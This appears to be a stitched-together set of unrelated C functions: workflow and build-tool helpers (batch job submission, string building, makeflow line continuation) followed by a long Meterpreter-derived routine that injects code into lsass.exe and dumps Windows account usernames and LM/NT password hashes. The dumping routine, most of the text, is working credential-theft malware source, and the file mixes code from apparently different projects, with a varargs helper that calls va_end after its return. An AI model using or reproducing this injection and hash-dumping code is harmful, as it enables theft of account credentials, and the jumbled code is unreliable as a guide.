int wavefront_task_submit_recursive( struct wavefront_task *n )
{
int i,j;
char command[PATH_MAX];
char filename[PATH_MAX];
char extra_output_files[PATH_MAX];
char *extra_input_files=NULL;
string_nformat(command, PATH_MAX, "./wavefront -M -X %d -Y %d ./%s %d %d >output.%d.%d 2>&1", n->x,n->y,function,n->width,n->height,n->x,n->y);
string_nformat(extra_output_files, PATH_MAX, "output.%d.%d",n->x,n->y);
extra_input_files = string_format("wavefront,%s",function);
for(i=-1;i<n->width;i++) {
string_nformat(filename, PATH_MAX, "R.%d.%d", n->x+i,n->y-1);
extra_input_files=string_combine(extra_input_files, ",");
extra_input_files=string_combine(extra_input_files, filename);
}
for(j=0;j<n->height;j++) {
string_nformat(filename, PATH_MAX, "R.%d.%d",n->x-1,n->y+j);
extra_input_files=string_combine(extra_input_files, ",");
extra_input_files=string_combine(extra_input_files, filename);
}
batch_job_id_t job_id = batch_job_submit_simple(batch_q,command,extra_input_files,extra_output_files);
free(extra_input_files);
return job_id;
}
static char * variable_print_argv( int withquotes )
{
char *result=0;
int i;
result = xxstrdup("");
for(i=1;i<head->argc;i++) {
result = string_combine(result,xxstrdup(head->argv[i]));
if(i!=(head->argc-1)) {
if(withquotes) {
result = string_combine(result,xxstrdup("\" \""));
} else {
result = string_combine(result,xxstrdup(" "));
}
}
}
return result;
}
// the caller should free the result.
char *create_umbrella_opt(bool remote_rename_support, char *files, bool is_output, const char *umbrella_logfile) {
char *s = files;
size_t size;
char *result = NULL;
// the result will be freed by the caller, therefore returning a copy of s is needed.
// Returning the original copy and free the original copy may cuase memory corruption.
if(!strcmp(s, "")) return xxstrdup(s);
// construct the --output or --inputs option of umbrella based on files
while((size = strcspn(s, ",\0")) > 0) {
char *t;
s[size] = '\0';
if(!remote_rename_support) {
t = s;
} else {
t = strchr(s, '=');
t++;
}
// avoid adding umbrella_logfile into umbrella_output_opt
if(strcmp(t, umbrella_logfile)) {
result = string_combine(result, t);
result = string_combine(result, "=");
result = string_combine(result, t);
if(is_output) result = string_combine(result, ":f,");
else result = string_combine(result, ",");
}
s[size] = ',';
s += size+1;
}
return result;
}
char *string_combine_multi(char *r, ...)
{
char *n;
va_list args;
va_start(args, r);
while((n = va_arg(args, char *))) {
r = string_combine(r, n);
}
return r;
va_end(args);
}
/** Read multiple lines connected by shell continuation symbol
* (backslash). Return as a single line. Caller will own the
* memory.
* The continuation is detected when backslash is the last symbol
* before the newline character, and the symbol last before last is
* not the backslash (double backslash is an escape sequence for
* backslash itself).
*/
char* get_continued_line(struct lexer_book *bk) {
char *cont_line = NULL;
char *raw_line = NULL;
int cont = 1;
while(cont && ((raw_line=get_line(bk->stream)) != NULL)) {
bk->column_number = 1;
bk->line_number++;
if(bk->line_number % 1000 == 0) {
debug(D_DEBUG, "read line %ld\n", bk->line_number);
}
/* Strip whitespace */
string_chomp(raw_line);
while(isspace(*raw_line)) {
raw_line++;
bk->column_number++;
}
size_t len = strlen(raw_line);
if(len>0 && raw_line[len-1] == '\\' &&
(len==1 || raw_line[len-2] != '\\')) {
raw_line[len-1] = '\0';
cont++;
}
else {
cont = 0;
}
if(cont_line) {
cont_line = string_combine(cont_line,raw_line);
}
else {
cont_line = xxstrdup(raw_line);
}
}
if(cont > 1) {
dag_parse_error(bk, "No line found after line continuation backslash");
free(cont_line);
cont_line = NULL;
fatal("Unable to parse the makeflow file");
}
return cont_line;
}
/*!
* @brief Function driving the SAM dumping.
* @param dwMillisecondsToWait How long to wait for the results before giving up.
* @param hashresults Pointer that will receive the hash dump results.
* @returns Indication of success or failure.
*/
DWORD __declspec(dllexport) control(DWORD dwMillisecondsToWait, char **hashresults)
{
HANDLE hThreadHandle = NULL, hLsassHandle = NULL, hReadLock = NULL, hFreeLock = NULL;
LPVOID pvParameterMemory = NULL, pvFunctionMemory = NULL;
DWORD_PTR dwFunctionSize;
SIZE_T sBytesWritten = 0, sBytesRead = 0;
DWORD dwNumberOfUsers = 0, dwCurrentUserIndex = 0, HashIndex = 0;
FUNCTIONARGS InitFunctionArguments, FinalFunctionArguments;
USERNAMEHASH *UsernameHashResults = NULL;
PVOID UsernameAddress = NULL;
DWORD dwError = 0;
char *hashstring = NULL;
/* METERPRETER CODE */
char buffer[100];
/* END METERPRETER CODE */
do
{
/* ORANGE control input - move this to the client perl side */
if (dwMillisecondsToWait < 60000)
{
dwMillisecondsToWait = 60000;
}
if (dwMillisecondsToWait > 300000)
{
dwMillisecondsToWait = 300000;
}
/* create the event kernel sync objects */
hReadLock = CreateEvent(NULL, FALSE, FALSE, READ_SYNC_EVENT_NAME);
hFreeLock = CreateEvent(NULL, FALSE, FALSE, FREE_SYNC_EVENT_NAME);
if (!hReadLock || !hFreeLock)
{
dwError = GetLastError();
break;
}
/* calculate the function size */
if ((DWORD_PTR)dump_sam >= (DWORD_PTR)sizer)
{
dprintf("Error calculating the function size.");
dwError = ERROR_INVALID_PARAMETER;
break;
}
dwFunctionSize = (DWORD_PTR)sizer - (DWORD_PTR)dump_sam;
if ((dwError = set_access_priv()) != ERROR_SUCCESS)
{
dprintf("Error setting SE_DEBUG_NAME privilege: %u (%x)");
break;
}
hLsassHandle = get_lsass_handle();
if (hLsassHandle == 0)
{
dwError = ERROR_INVALID_PARAMETER;
dprintf("Error getting lsass.exe handle.");
break;
}
/* set the arguments in the context structure */
if ((dwError = setup_dump_sam_arguments(&InitFunctionArguments, dwMillisecondsToWait)) != ERROR_SUCCESS)
{
dprintf("[PASSWD] Unable to set arguments %u (%x)", dwError, dwError);
break;
}
/* allocate memory for the context structure */
pvParameterMemory = VirtualAllocEx(hLsassHandle, NULL, sizeof(FUNCTIONARGS), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (pvParameterMemory == NULL)
{
dwError = GetLastError();
dprintf("[PASSWD] Failed to allocat memory %u (%x)", dwError, dwError);
break;
}
/* write context structure into remote process */
if (WriteProcessMemory(hLsassHandle, pvParameterMemory, &InitFunctionArguments, sizeof(InitFunctionArguments), &sBytesWritten) == 0)
{
dwError = GetLastError();
dprintf("[PASSWD] Failed to write process memory for function args %u (%x)", dwError, dwError);
break;
}
if (sBytesWritten != sizeof(InitFunctionArguments))
{
dwError = 1;
break;
}
sBytesWritten = 0;
/* allocate memory for the function */
pvFunctionMemory = VirtualAllocEx(hLsassHandle, NULL, dwFunctionSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (pvFunctionMemory == NULL)
{
dwError = GetLastError();
dprintf("[PASSWD] Failed to allocate process memory %u (%x)", dwError, dwError);
break;
}
/* write the function into the remote process */
if (WriteProcessMemory(hLsassHandle, pvFunctionMemory, dump_sam, dwFunctionSize, &sBytesWritten) == 0)
{
dwError = GetLastError();
dprintf("[PASSWD] Failed to write process memory for function body %u (%x)", dwError, dwError);
break;
}
if (sBytesWritten != dwFunctionSize)
{
dwError = 1;
break;
}
sBytesWritten = 0;
/* start the remote thread */
if ((hThreadHandle = create_remote_thread(hLsassHandle, pvFunctionMemory, pvParameterMemory)) == NULL)
{
dwError = GetLastError();
dprintf("[PASSWD] Failed to create remote thread %u (%x)", dwError, dwError);
break;
}
/* wait until the data is ready to be collected */
if (WaitForSingleObject(hReadLock, dwMillisecondsToWait) != WAIT_OBJECT_0)
{
dwError = GetLastError();
dprintf("[PASSWD] Timed out waiting for the data to be collected: %u (%x)", dwError, dwError);
break;
}
/* read results of the injected function */
if (ReadProcessMemory(hLsassHandle, pvParameterMemory, &FinalFunctionArguments, sizeof(InitFunctionArguments), &sBytesRead) == 0)
{
dwError = GetLastError();
dprintf("[PASSWD] Failed to read process memory to get result: %u (%x)", dwError, dwError);
break;
}
if (sBytesRead != sizeof(InitFunctionArguments))
{
dwError = 1;
break;
}
sBytesRead = 0;
/* allocate space for the results */
UsernameHashResults = (USERNAMEHASH *)malloc(FinalFunctionArguments.dwDataSize);
if (UsernameHashResults == NULL)
{
dwError = 1;
break;
}
/* determine the number of elements and copy over the data */
dwNumberOfUsers = FinalFunctionArguments.dwDataSize / sizeof(USERNAMEHASH);
/* copy the context structure */
if (ReadProcessMemory(hLsassHandle, FinalFunctionArguments.pUsernameHashData, UsernameHashResults, FinalFunctionArguments.dwDataSize, &sBytesRead) == 0)
{
dwError = GetLastError();
dprintf("[PASSWD] Failed to read process memory to get hashresults: %u (%x)", dwError, dwError);
break;
}
if (sBytesRead != FinalFunctionArguments.dwDataSize)
{
break;
}
sBytesRead = 0;
// save the old mem addy, malloc new space, copy over the data, free the old mem addy
for (dwCurrentUserIndex = 0; dwCurrentUserIndex < dwNumberOfUsers; dwCurrentUserIndex++)
{
UsernameAddress = UsernameHashResults[dwCurrentUserIndex].Username;
UsernameHashResults[dwCurrentUserIndex].Username = (char *)malloc(UsernameHashResults[dwCurrentUserIndex].Length + 1);
if (UsernameHashResults[dwCurrentUserIndex].Username == NULL)
{
dwError = 1;
break;
}
if (ReadProcessMemory(hLsassHandle, UsernameAddress, UsernameHashResults[dwCurrentUserIndex].Username, UsernameHashResults[dwCurrentUserIndex].Length, &sBytesRead) == 0)
{
dwError = 1;
break;
}
if (sBytesRead != UsernameHashResults[dwCurrentUserIndex].Length)
{
dwError = 1;
break;
}
UsernameHashResults[dwCurrentUserIndex].Username[UsernameHashResults[dwCurrentUserIndex].Length] = 0;
}
/* signal that all data has been read and wait for the remote memory to be free'd */
if (SetEvent(hFreeLock) == 0)
{
dwError = 1;
break;
}
if (WaitForSingleObject(hReadLock, dwMillisecondsToWait) != WAIT_OBJECT_0)
{
dprintf("The timeout hit.\n");
dwError = 1;
break;
}
/* display the results and free the malloc'd memory for the username */
for (dwCurrentUserIndex = 0; dwCurrentUserIndex < dwNumberOfUsers; dwCurrentUserIndex++)
{
/* METERPRETER CODE */
hashstring = string_combine(hashstring, UsernameHashResults[dwCurrentUserIndex].Username);
hashstring = string_combine(hashstring, ":");
_snprintf_s(buffer, sizeof(buffer), 30, "%d", UsernameHashResults[dwCurrentUserIndex].RID);
hashstring = string_combine(hashstring, buffer);
hashstring = string_combine(hashstring, ":");
/* END METERPRETER CODE */
//printf("%s:%d:", UsernameHashResults[dwCurrentUserIndex].Username, UsernameHashResults[dwCurrentUserIndex].RID);
for (HashIndex = 16; HashIndex < 32; HashIndex++)
{
/* ORANGE - insert check for ***NO PASSWORD***
if( (regData[4] == 0x35b4d3aa) && (regData[5] == 0xee0414b5)
&& (regData[6] == 0x35b4d3aa) && (regData[7] == 0xee0414b5) )
sprintf( LMdata, "NO PASSWORD*********************" );
*/
_snprintf_s(buffer, sizeof(buffer), 3, "%02x", (BYTE)(UsernameHashResults[dwCurrentUserIndex].Hash[HashIndex]));
hashstring = string_combine(hashstring, buffer);
//printf("%02x", (BYTE)(UsernameHashResults[dwCurrentUserIndex].Hash[HashIndex]));
}
hashstring = string_combine(hashstring, ":");
//printf(":");
for (HashIndex = 0; HashIndex < 16; HashIndex++)
{
/* ORANGE - insert check for ***NO PASSWORD***
if( (regData[0] == 0xe0cfd631) && (regData[1] == 0x31e96ad1)
&& (regData[2] == 0xd7593cb7) && (regData[3] == 0xc089c0e0) )
sprintf( NTdata, "NO PASSWORD*********************" );
*/
_snprintf_s(buffer, sizeof(buffer), 3, "%02x", (BYTE)(UsernameHashResults[dwCurrentUserIndex].Hash[HashIndex]));
hashstring = string_combine(hashstring, buffer);
//printf("%02x", (BYTE)(UsernameHashResults[dwCurrentUserIndex].Hash[HashIndex]));
}
hashstring = string_combine(hashstring, ":::\n");
//printf(":::\n");
}
} while (0);
/* relesase the event objects */
if (hReadLock)
{
CloseHandle(hReadLock);
}
if (hFreeLock)
{
CloseHandle(hFreeLock);
}
/* close handle to lsass */
if (hLsassHandle)
{
CloseHandle(hLsassHandle);
}
/* free the context structure and the injected function and the results */
if (pvParameterMemory)
{
VirtualFreeEx(hLsassHandle, pvParameterMemory, sizeof(FUNCTIONARGS), MEM_RELEASE);
}
if (pvFunctionMemory)
{
VirtualFreeEx(hLsassHandle, pvFunctionMemory, dwFunctionSize, MEM_RELEASE);
}
/* free the remote thread handle */
if (hThreadHandle)
{
CloseHandle(hThreadHandle);
}
/* free the results structure including individually malloced space for usernames */
if (UsernameHashResults)
{
for (dwCurrentUserIndex = 0; dwCurrentUserIndex < dwNumberOfUsers; dwCurrentUserIndex++)
{
if (UsernameHashResults[dwCurrentUserIndex].Username)
{
free(UsernameHashResults[dwCurrentUserIndex].Username);
}
}
free(UsernameHashResults);
}
/* return hashresults */
*hashresults = hashstring;
/* return the correct code */
return dwError;
}
